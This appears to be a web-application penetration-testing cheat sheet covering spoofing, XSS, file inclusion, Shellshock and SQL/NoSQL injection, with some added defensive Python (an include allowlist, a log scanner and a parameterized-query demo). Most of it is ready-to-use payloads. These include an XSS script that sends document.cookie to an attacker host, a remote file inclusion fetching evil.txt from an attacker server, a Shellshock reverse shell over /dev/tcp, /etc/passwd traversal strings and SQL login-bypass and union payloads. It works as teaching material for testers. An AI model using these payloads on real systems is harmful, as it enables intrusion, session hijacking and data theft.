There are many different ways a web application can be exploited. This page lists a few simple examples, resources and tools.
Browser add-ons:
Commands:
- curl
- wget
Proxies:
- 🔗 Burp Suite
- OWASP ZAP
Bot Spoofing
Spoofing the Googlebot user agent when requesting a robots.txt page:
curl -A "Googlebot/2.1 (+http://www.google.com/bot.html)" http://<host>/robots.txt
Authentication Spoofing
Simple Cookies
Some older websites use weak authentication cookies, for example taking a string such as:
user:admin
and base64-encoding it, which yields a valid request header of:
auth: dXNlcjphZG1pbgo=
To create the encoded string:
echo 'user:admin' | base64 -
To decode the string:
echo 'dXNlcjphZG1pbgo=' | base64 -d -
Padding
Some websites may be vulnerable to padding oracle attacks. Kali ships with padbuster:
padbuster [url] [encrypt] [blocksize] [options]
Resources
🔗 https://blog.gdssecurity.com/labs/2010/9/14/automated-padding-oracle-attacks-with-padbuster.html
🔗 https://spring.io/blog/2014/01/20/exploiting-encrypted-cookies-for-fun-and-profit
XSS
iFrames
Start a listener on the attacker machine:
nc -lvp <port>
Reverse Connection
<iframe src="http://<attackeripaddress>:<port>/madeup.php" height="0" width="0"></iframe>
Cookie Stealer
<script>
new Image().src="http://<attackeripaddress>:<port>/madeup.php?output="+document.cookie;</script>
Captured cookies can then be replayed using a browser plugin or Burp Proxy.
Resources
🔗 https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
🔗 https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
🔗 https://gist.github.com/phra/76518994c908ac836ec5a393f188f89a
Local File Inclusion
Example
Server Side Code, without validation:
...
$file = $_GET['file'];
if (isset($file)) {
include( $file );
}
...
Intention
Client side request:
http://<host>/index.php?file=myfile.txt
This request will include the file myfile.txt.
Exploit
http://<host>/index.php?file=/etc/passwd
This request will expose a local file from the server.
Filter Avoidance
Some code may filter out the characters /.\'" or more; URL encoding may get past a naive filter.
http://<host>/index.php?file=%2Fetc%2Fpasswd
Directory Traversal
http://<host>/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd
http://<host>/index.php?file=....//....//....//....//etc//passwd
Remote Code Execution
Server Side Code, without validation:
...
$page = $_GET['page'];
if (isset($page)) {
include( $page . '.php');
}
...
Intention
Client side request:
http://<host>/index.php?page=mypage
This request will include the local relative file mypage.php.
Exploit
On the attacking machine start a web server:
python -m SimpleHTTPServer <port>
Create a malicious PHP page:
echo '<?php shell_exec("ifconfig"); ?>' > evil.txt
Make the request:
http://<host>/index.php?page=http://<attackingipaddress>:<port>/evil.txt%00
The null byte terminator %00 is used to terminate the filename so the server will not look for evil.txt.php.
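The include() examples above have no validation at all. The following is an added example (not code from the page) showing, in Python, the checks a hardened version of the ?page= handler would perform: percent-decoding, null-byte and URL-scheme rejection, path-separator rejection, an allowlist of page names and a final containment check. PAGE_DIR and ALLOWED_PAGES are assumed values.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumptions for this example (not from the page): pages live under PAGE_DIR and
# only the names in ALLOWED_PAGES may ever be included.
PAGE_DIR = "/var/www/pages"
ALLOWED_PAGES = {"mypage", "about"}

def decode_param(raw: str) -> str:
    """Percent-decode the way the server would, so the checks see the real value.
    Decoding twice also catches double-encoded input (%252F -> %2F -> /)."""
    return unquote(unquote(raw))

def reject_reason(value: str) -> Optional[str]:
    """Return why a decoded ?page= value is unsafe, or None if it passes."""
    if "\x00" in value:
        return "null byte"          # %00 truncation defeats the '.php' suffix
    if "://" in value:
        return "url scheme"         # remote file inclusion (page=http://.../evil.txt)
    if "/" in value or "\\" in value:
        return "path separator"     # /etc/passwd, ..%2F.., ....// all contain '/'
    if value not in ALLOWED_PAGES:
        return "not in allowlist"   # unknown page names are refused outright
    return None

def resolve_page(raw: str) -> Optional[str]:
    """Map an untrusted ?page= value to the file to include, or None to refuse."""
    value = decode_param(raw)
    if reject_reason(value) is not None:
        return None
    path = posixpath.normpath(posixpath.join(PAGE_DIR, value + ".php"))
    # Defence in depth: the final path must still sit inside PAGE_DIR.
    if posixpath.commonpath([PAGE_DIR, path]) != PAGE_DIR:
        return None
    return path
```

The allowlist alone would already stop every payload on this page; the earlier checks give a useful reason to log when a request is refused.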
Shellshock
Shellshock is a bug discovered in the bash shell that allows remote code execution. Web servers are most commonly exposed through PHP and CGI scripts that pass request data into system environment variables.
Exploit
Test by checking whether an echoed test string comes back in the response to a request:
curl -H "User-Agent: () { :;}; echo 'test';" http://<host>/<page>
If successful, set up a listener on the attacking machine:
nc -lvp <port>
Then send the attack code:
curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/<attackingipaddress>/<port> 0>&1;" http://<host>/<page>
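From the detection side, the requests in the LFI, RFI, Shellshock and SQL injection sections all leave recognisable traces in web server access logs. The following is an added example (not from the page) that parses combined-format log lines, percent-decodes them and flags the techniques covered above; the log lines are constructed for the example and the IP addresses are documentation ranges.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Signatures for the techniques on this page; each is checked against the named fields.
SIGNATURES = [
    ("shellshock", re.compile(r"\(\)\s*\{"), ("agent", "referer")),       # "() { :;};" in a header
    ("shellshock", re.compile(r"/dev/tcp/"), ("agent", "referer")),        # bash reverse connection
    ("lfi", re.compile(r"\.\./|/etc/passwd|\x00"), ("request",)),          # traversal, null byte
    ("rfi", re.compile(r"[?&]\w+=\w+://"), ("request",)),                  # page=http://.../evil.txt
    ("sqli", re.compile(r"(?i)\bunion\b.*\bselect\b|\border by \d+"), ("request",)),
]

def scan_line(line):
    """Return (client ip, sorted labels) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode %2F, %00, %20 ... so the signatures see what the application saw.
    fields = {k: unquote(v) for k, v in m.groupdict().items()}
    hits = {label for label, pat, where in SIGNATURES if any(pat.search(fields[w]) for w in where)}
    return fields["ip"], sorted(hits)

def scan_log(text):
    """Map each client ip with at least one hit to the sorted labels seen in its requests."""
    findings = {}
    for line in text.splitlines():
        result = scan_line(line)
        if result and result[1]:
            findings.setdefault(result[0], set()).update(result[1])
    return {ip: sorted(labels) for ip, labels in findings.items()}

# Constructed sample log (not real traffic): one benign request plus the page's techniques.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=mypage HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.8 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1907 "-" "curl/7.88.1"
198.51.100.8 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?page=http://203.0.113.5:8000/evil.txt%00 HTTP/1.1" 200 80 "-" "curl/7.88.1"
198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 44 "-" "() { :;}; echo 'test';"
198.51.100.9 - - [10/Oct/2023:13:56:20 +0000] "GET /page.php?id=3%20union%20select%201,2,@@version,4 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, labels in scan_log(SAMPLE_LOG).items():
        print(ip, ", ".join(labels))
```

Signature matching of this kind is a starting point for alerting, not proof of compromise; a 200 status on a traversal request is the line worth investigating first.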
Resources
🔗 https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
🔗 https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion
🔗 https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013)
SQL/NoSQL Injection
There are many popular database systems whose query languages differ in syntax, but the principles are the same:
- MySQL
- Oracle DB
- Microsoft SQL
- PostgreSQL
- MongoDB
In-Band SQLi
The most common type, often considered the default kind of SQL injection attack.
Authentication Bypass
Server side example code, without validation:
...
$user = $_POST['user'];
$password = $_POST['password'];
$query = "select * from users where name = '$user' and password = '$password' ";
...
$result = mysql_query($query);
if (mysql_num_rows($result) == 1)
    // load successful data/page
...
Example MySQL users table:
mysql> select * from users;
+----+--------+----------+
| id | name | password |
+----+--------+----------+
| 1 | admin | 123456 |
+----+--------+----------+
1 row in set (0.00 sec)
Intended Results
On a login with username and password fields, a successful query would look something like this:
mysql> select * from users where name='admin' and password='123456';
+----+--------+----------+
| id | name | password |
+----+--------+----------+
| 1 | admin | 123456 |
+----+--------+----------+
1 row in set (0.00 sec)
And a failed login query would result in no rows returned:
mysql> select * from users where name='admin' and password='1234';
Empty set (0.00 sec)
Exploit
The query needs to return exactly 1 row. This can be exploited by injecting a condition that is always true, such as 1=1, and adding LIMIT 1 so that only one row comes back.
mysql> select * from users where name='admin' or 1=1 LIMIT 1;# and password='1234';
The value entered in the application's username field would look like:
admin' or 1=1 LIMIT 1;#
The # also comments out the rest of the query, including the password check.
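The bypass above works only because the PHP example pastes the field values into the SQL text. As an added example (not from the page), the Python below reproduces that string construction next to a parameterized query against an in-memory SQLite copy of the users table; with placeholders the injected value is compared literally against the name column and the login fails.

```python
import sqlite3

# The field value from the section above.
PAYLOAD = "admin' or 1=1 LIMIT 1;#"

def build_vulnerable_query(user, password):
    """Same string interpolation as the PHP example: user input becomes part of
    the SQL text, so a quote and a comment marker rewrite the query. Returned
    as a string only, so the reader can see exactly what the database would get."""
    return f"select * from users where name = '{user}' and password = '{password}'"

def make_db():
    """In-memory copy of the example users table (constructed; same single row).
    Storing plaintext passwords as in the example is itself a weakness."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer primary key, name text, password text)")
    conn.execute("insert into users values (1, 'admin', '123456')")
    conn.commit()
    return conn

def login_parameterized(conn, user, password):
    """Hardened form: the SQL text is fixed and the values travel separately,
    so the payload is looked up as a literal user name and matches nothing."""
    rows = conn.execute(
        "select * from users where name = ? and password = ?", (user, password)
    ).fetchall()
    return len(rows) == 1

if __name__ == "__main__":
    print(build_vulnerable_query(PAYLOAD, "1234"))
    db = make_db()
    print("legitimate:", login_parameterized(db, "admin", "123456"))
    print("injected:  ", login_parameterized(db, PAYLOAD, "1234"))
```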
Error Based SQLi
This type of attack helps enumerate server information from the error messages returned for malformed requests.
An application input field allows a simple test:
'; test
which may produce an error message such as:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1.
Union Based SQLi
This is often used after enumerating with error-based messages. A union in an SQL statement combines the results of two or more SELECT statements, so long as they return the same number of columns with matching data types in the same order. A union all keeps duplicate rows.
SQL code example:
SELECT City FROM Customers
UNION
SELECT City FROM Vendors
ORDER BY City;
Server side code example:
...
$id = $_GET['id'];
...
$q = "SELECT * FROM $tbl_name where id = ".$id;
...
Client request example:
http://<host>/page.php?id=2
Exploit
Append order by 1 to the URL and keep incrementing the number until the server returns an error.
http://<host>/page.php?id=2 order by 1
Say ?id=4 does not exist; then it can be assumed there are only ids 1, 2 and 3.
http://<host>/page.php?id=1 union select 1,2,3,4
This can then be used to build a payload:
http://<host>/page.php?id=1 union all select 1,2,3,4
http://<host>/page.php?id=3 union select 1,2,version(),4
http://<host>/page.php?id=3 union select 1,2,@@version,4
Resources
🔗 https://rawsec.ml/en/types-of-sql-injection/
🔗 http://www.sqlinjection.net/errors/
Automated Scripts
SQLi
Crawl a page:
sqlmap -u http://<host> --crawl=1
If injection is found:
sqlmap -u http://<host>/page.php?id=738 --dbms=mysql --dump --threads=5
NoSQLi
Download NoSQLMap:
git clone https://github.com/codingo/NoSQLMap.git
Go into the directory and install the prerequisites:
cd NoSQLMap/
pip install couchdb pbkdf2 ipcalc
Run it:
python nosqlmap.py
All Methods
Using OWASP ZAP, once the proxy has been set up and the application has been scanned or spidered, use Attack mode. Results appear in the Alerts tab with payloads and requests.
Exposed Paths
Look for directories such as:
/robots.txt
/admin
/admin.php
/login
/login.php
/README
/README.md
/LICENSE
/test/
/test.php
/uploads/